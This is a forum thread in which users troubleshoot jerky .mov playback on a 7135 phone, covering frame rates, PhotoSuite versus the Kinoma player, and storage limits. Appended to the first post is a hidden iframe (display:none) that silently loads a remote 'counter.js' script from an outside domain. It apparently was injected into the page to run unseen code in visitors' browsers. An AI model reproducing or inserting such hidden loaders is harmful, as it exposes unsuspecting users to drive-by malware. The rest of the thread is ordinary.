+ Reply to Thread

Video files jerky

I've imported a .mov file onto the SD card in my 7135, and viewing it via PhotoSuite. (Photo Viewer says there's no file on my card.) Though I can play it, it seems very slow, and very jerky -- more like a slide show on steroids.

Is this what we should expect from a video file, or am I doing something wrong? NOTE: Video was created on a Mac using iMovie and saved as a 5.5 MB .mov file, and uploaded to SD card in phone via PhotoSuite Mobile via my PC at work.)

Thanks for any video help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Video files jerky

Larch:

Originally posted by The Larch
    I've imported a .mov file onto the SD card in my 7135, and viewing it via PhotoSuite. (Photo Viewer says there's no file on my card.) Though I can play it, it seems very slow, and very jerky -- more like a slide show on steroids.

Is this what we should expect from a video file, or am I doing something wrong? NOTE: Video was created on a Mac using iMovie and saved as a 5.5 MB .mov file, and uploaded to SD card in phone via PhotoSuite Mobile via my PC at work.)

Thanks for any video help!
    My only experience was with a 10 second Windows Media Video file (WMV), which was encoded at 29 FPS. When I played that file the motion was smooth (of course, it IS 29 FPS!)

Otter may be on to something. Check to see how many FPS your movie is set to. I used iMovie to create the videos i posted on the board here but I'm not sure what the settings are.

Personally, i have given up on PhotoSuite. Kinoma player seems to be the best solution until Photosuite improves the interface.

pdageek

Jerky video is not a problem I've run into with the Kinoma player. The video is smooth enough, even at relatively low frame rates of 8 or 10. It's just getting a movie to sync up properly with the sound for any length of time that I'm having trouble doing.

Originally posted by pdageek
    Otter may be on to something. Check to see how many FPS your movie is set to. I used iMovie to create the videos i posted on the board here but I'm not sure what the settings are.

Personally, i have given up on PhotoSuite. Kinoma player seems to be the best solution until Photosuite improves the interface.

pdageek
    Once in PhotoSuite I could adjust the speed to 15, but same jerky stuff. I'll look into the Kinoma player. Thanks!!

move the file to the phone. it goes much faster

Yeah, but if you are going to watch an actual show or movie (not a short clip), there's no way it will fit on your phone.
    ~'kito
    pdaPhoneHome Moderator